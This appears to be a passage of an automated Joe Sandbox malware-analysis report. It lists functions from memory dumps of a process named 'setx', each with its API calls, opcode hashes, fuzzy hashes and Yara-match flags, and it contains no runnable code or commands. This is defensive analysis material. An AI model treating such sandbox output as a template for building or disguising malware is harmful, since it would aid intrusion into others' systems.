                        • Instruction Fuzzy Hash: 0001A1716403047BD610EAA5DC42FEBB3ACEF89714F00410EFA19A7281D6B5795187A5
                        Function 004380B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtClose.NTDLL(00430F2D,?,00000000,004232CB,?,00430F2D,004232CB,0000008F,?,?,?,?,?,?,?,00434636), ref: 004380E7
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 5c4ad17ae407fe2ac8f426d28e51eb09909b9fe73817bf2787259616eddc6f9f
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 5EE08C362006047BE620EB6ADC06FDB776CEFC5B65F01405AFA0DA7242D6B1B90187F8
                        Function 02C54340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e7dfd4ed554a121d730d8b6a6877a3db456af472548d40c6cb13b31988e50d97
                        • Instruction ID: 743146c175fbefac7b78938ed5c57c94a0402f5558002492d1f1223127d817ab
                        • Opcode Fuzzy Hash: e7dfd4ed554a121d730d8b6a6877a3db456af472548d40c6cb13b31988e50d97
                        • Instruction Fuzzy Hash: 049002B1645800129140715848C8557400597E0701B55C111E4424554D8A158A5A5361
                        Function 02C54650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 36dd21acca2ba944f5df8765bef93db090b8130492eaeb4575c9508b288e8b44
                        • Instruction ID: 8690680f5bc551ce3affd667144f69207b0c33f2200e4f7604ef292343608b9e
                        • Opcode Fuzzy Hash: 36dd21acca2ba944f5df8765bef93db090b8130492eaeb4575c9508b288e8b44
                        • Instruction Fuzzy Hash: 089002E164150042414071584848417600597E1701395C215A4554560D861989599269
                        Function 02C52AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 75593c4e986431cbce13cdff1ddffffcde1b048c7ee71ac9a8addcd06764f004
                        • Instruction ID: 5235873462044b3bb4fea47176b8a7d45f271a6a5c36c80fbf7338b0b8c3de6d
                        • Opcode Fuzzy Hash: 75593c4e986431cbce13cdff1ddffffcde1b048c7ee71ac9a8addcd06764f004
                        • Instruction Fuzzy Hash: 559004F5351400030105F55C074C5170047C7D5751355C131F5015550DD733CD755131
                        Function 02C52AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e6c49a4597d7af66a5ce2797f0e3aa3131d2f24d24d81b45a50fb86979e40c20
                        • Instruction ID: 3727fabea78eb162829406fd53687d3eaa69929dcfa5bc874262db742f4b88d4
                        • Opcode Fuzzy Hash: e6c49a4597d7af66a5ce2797f0e3aa3131d2f24d24d81b45a50fb86979e40c20
                        • Instruction Fuzzy Hash: E99002A5261400020145B558064851B044597D6751395C115F5416590DC62289695321
                        Function 02C52BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 2ec9dee552b6cd9572f641a017306677e596f213ca97ae16ce1f5dbc5005adb2
                        • Instruction ID: 169610cf049c808415ad3040a807872fb0ae1f3c329d9584ac00774683e93992
                        • Opcode Fuzzy Hash: 2ec9dee552b6cd9572f641a017306677e596f213ca97ae16ce1f5dbc5005adb2
                        • Instruction Fuzzy Hash: E49002B124544842D14071584448A57001587D0705F55C111A4064694E96268E59B661
                        Function 02C52BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b0b92b1bceec6365a53941987d2fe3f967ed8d737314508feba7dbda7c541928
                        • Instruction ID: 4cfbfd1ba81f714654badf3a93dfb67b916fe2388247174974be3a5b29605eb0
                        • Opcode Fuzzy Hash: b0b92b1bceec6365a53941987d2fe3f967ed8d737314508feba7dbda7c541928
                        • Instruction Fuzzy Hash: 079002B124140802D1807158444865B000587D1701F95C115A4025654ECA168B5D77A1
                        Function 02C52BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 334992a745c4741bf2a052d1183c3ca9a310d9d59270aa3100212a8992dd950b
                        • Instruction ID: a721dd51798e90ba6d020bb04d731725aa0b8bd5de0f86ce8d2479d43ad93cb9
                        • Opcode Fuzzy Hash: 334992a745c4741bf2a052d1183c3ca9a310d9d59270aa3100212a8992dd950b
                        • Instruction Fuzzy Hash: 759002B164540802D15071584458757000587D0701F55C111A4024654E87568B5976A1
                        Function 02C52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 172e9a393ee3cb18b789c3a175eba475de8e61ea97b6a3e69fc526a286719352
                        • Instruction ID: fdf675f5ed85e867b6850405d9e9963ab910675dfeb5d1038dba3c225aa98330
                        • Opcode Fuzzy Hash: 172e9a393ee3cb18b789c3a175eba475de8e61ea97b6a3e69fc526a286719352
                        • Instruction Fuzzy Hash: F99002E124240003410571584458627400A87E0601B55C121E5014590EC52689956125
                        Function 02C52EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d678e02bef3e73973be7d9a5647b442e5329e03b4f9bfdaedf8e4bff975f50fc
                        • Instruction ID: 064bb6b1eefedec75836cabe3f340c95218ef0c66bccbc04e98971c804a1f697
                        • Opcode Fuzzy Hash: d678e02bef3e73973be7d9a5647b442e5329e03b4f9bfdaedf8e4bff975f50fc
                        • Instruction Fuzzy Hash: 239002E124180403D14075584848617000587D0702F55C111A6064555F8A2A8D556135
                        Function 02C52E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 70b93965dc6d8bda517f48c50a435986e3ccde95bce1f4446b5bf497483161d0
                        • Instruction ID: 7b3f9734d52605c67229f69720f2c75665f25ad5647ccdedcb6cfdec34a668b6
                        • Opcode Fuzzy Hash: 70b93965dc6d8bda517f48c50a435986e3ccde95bce1f4446b5bf497483161d0
                        • Instruction Fuzzy Hash: C69002A164140502D10171584448627000A87D0641F95C122A5024555FCA268A96A131
                        Function 02C52FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c0e1a62b062c5928a614e3416bce0b87b97534dd29a9b9744d6761455ccfada3
                        • Instruction ID: 03d8cb6b839a580d1ff08fbc3d5175530cdc84d3675a0ca033e2e1662891c6b9
                        • Opcode Fuzzy Hash: c0e1a62b062c5928a614e3416bce0b87b97534dd29a9b9744d6761455ccfada3
                        • Instruction Fuzzy Hash: 2D9002A1251C0042D20075684C58B17000587D0703F55C215A4154554DC91689655521
                        Function 02C52FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1655ec8f122b8fc16c3a013017c23f196cd515b50db2f497e58d4e3b4c909d7d
                        • Instruction ID: 4d4b980df26a352002aa4fbb725a0bf496fd46e791d1b12f7f9bf4997e2ffbad
                        • Opcode Fuzzy Hash: 1655ec8f122b8fc16c3a013017c23f196cd515b50db2f497e58d4e3b4c909d7d
                        • Instruction Fuzzy Hash: 769002A1641400424140716888889174005ABE1611755C221A4998550E855A89695665
                        Function 02C52F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a9838e45b3bd5a8d13582d99b056acd92aba20239c478326375c1e2efe9c3459
                        • Instruction ID: 0690fa4b8598a6488811cefe00192d513a797071a42c4e53b5933fcb012fb523
                        • Opcode Fuzzy Hash: a9838e45b3bd5a8d13582d99b056acd92aba20239c478326375c1e2efe9c3459
                        • Instruction Fuzzy Hash: A99002E138140442D10071584458B170005C7E1701F55C115E5064554E861ACD566126
                        Function 02C52CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d90d848f1ecf68d18c0864a3f7552224f401c595aabeddbcdaff38d05a7307ad
                        • Instruction ID: 1cd4f9dd55c84ac5ca53c89da06efafb730bc165d29cdce145f4758dd9b44521
                        • Opcode Fuzzy Hash: d90d848f1ecf68d18c0864a3f7552224f401c595aabeddbcdaff38d05a7307ad
                        • Instruction Fuzzy Hash: 599002B124140402D1007598544C657000587E0701F55D111A9024555FC66689956131
                        Function 02C52C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c1a86643e50013e858e6c39a7b21f365975c416efad313813934470de4ed9f49
                        • Instruction ID: e9e4bc5ecd85fa65dbc5c96375a26f88c4d0e6ddc4b7c6665466063163f269e8
                        • Opcode Fuzzy Hash: c1a86643e50013e858e6c39a7b21f365975c416efad313813934470de4ed9f49
                        • Instruction Fuzzy Hash: 009002B124140842D10071584448B57000587E0701F55C116A4124654E8616C9557521
                        Function 02C52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e5a034cdde1c128f9216e1431cdc232a6f72532bca33b87da9cc01b0de63b8f8
                        • Instruction ID: 35e8727beff8cbd7159b8c1e54859347f5d17bc56a63835faadd3770390f5863
                        • Opcode Fuzzy Hash: e5a034cdde1c128f9216e1431cdc232a6f72532bca33b87da9cc01b0de63b8f8
                        • Instruction Fuzzy Hash: 5C9002B124148802D1107158844875B000587D0701F59C511A8424658E869689957121
                        Function 02C52DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4ff18b6ad7232448740c6515705fdcc155b2d38eb83d7218c89b8b0cef13d76c
                        • Instruction ID: 848427abd4a5788bc16a685b1c53d10fd0ae453654de9c8be789cd9999c355d4
                        • Opcode Fuzzy Hash: 4ff18b6ad7232448740c6515705fdcc155b2d38eb83d7218c89b8b0cef13d76c
                        • Instruction Fuzzy Hash: 159002A1282441525545B1584448517400697E0641795C112A5414950D8527995AD621
                        Function 02C52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 55bfcdcf552636bc756db7721299e7048e27864871323a7667efe1e5d7ab3f3a
                        • Instruction ID: a06d7854be1b130c922f1866a72f30cbf9e72b072d7f7e07614846bdcf7ebb61
                        • Opcode Fuzzy Hash: 55bfcdcf552636bc756db7721299e7048e27864871323a7667efe1e5d7ab3f3a
                        • Instruction Fuzzy Hash: 979002B124140413D11171584548717000987D0641F95C512A4424558E96578A56A121
                        Function 02C52D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 880c670e809f29f63924961b348678e9e6e86242c0c8abf590bca50777299565
                        • Instruction ID: aff4f584957a071727ad1fac6671ec12618aec9553e7df2bc08ce29d259f1743
                        • Opcode Fuzzy Hash: 880c670e809f29f63924961b348678e9e6e86242c0c8abf590bca50777299565
                        • Instruction Fuzzy Hash: 8D9002A925340002D1807158544C61B000587D1602F95D515A4015558DC916896D5321
                        Function 02C52D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 451f290f88da298823fac601fe21eb57c937bfe519acd9fe5d20105c9b24a36b
                        • Instruction ID: de4eacd6a80e092aaa477031d8730f82b74adb57aa2183afdc26c54b8ffae6ae
                        • Opcode Fuzzy Hash: 451f290f88da298823fac601fe21eb57c937bfe519acd9fe5d20105c9b24a36b
                        • Instruction Fuzzy Hash: C99004F134140003D140715C545C7174005D7F1701F55D111F4414554DDD17CD5F5333
                        Function 02C535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a2bd5b1fa313986983e51314660554309d609412dfe99cb5107a4f037a18592b
                        • Instruction ID: 19ec33c2fe51b2e71b9d134be3963983404a6ca68787c6010d0622400556bcbf
                        • Opcode Fuzzy Hash: a2bd5b1fa313986983e51314660554309d609412dfe99cb5107a4f037a18592b
                        • Instruction Fuzzy Hash: 4C9002B164550402D10071584558717100587D0601F65C511A4424568E87968A5565A2
                        Function 02C539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 83d37c3250e15750d05f02cbabcf09771ba9bcdbcb3e07239a9defdb75627500
                        • Instruction ID: 680712e66243cad12848a6cf9a392d0f4b3474fab59be9157ea37b60819ddffa
                        • Opcode Fuzzy Hash: 83d37c3250e15750d05f02cbabcf09771ba9bcdbcb3e07239a9defdb75627500
                        • Instruction Fuzzy Hash: 3E9002A128545102D150715C44486274005A7E0601F55C121A4814594E855689596221
                        Function 00420B49 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 421 420b49-420bbe call 43a020 call 43aa30 call 424510 call 411410 call 431370 433 420be0-420be5 421->433 434 420bc0-420bd1 PostThreadMessageW 421->434 434->433 435 420bd3-420bdd 434->435 435->433
                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00420BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: 6034b6b914f0d46423d71107867abd6949ba32f05ffc85920bb509cca817bded
                        • Instruction ID: 2edf36dd8f0a2a1a9b695b76ac5fa9aa2af6af79be439a870c19b515155170c0
                        • Opcode Fuzzy Hash: 6034b6b914f0d46423d71107867abd6949ba32f05ffc85920bb509cca817bded
                        • Instruction Fuzzy Hash: 0511C831E4025876EB21ABD19C02FDF7B7C9F41B58F44815AFE047B281D6786A06C7E9
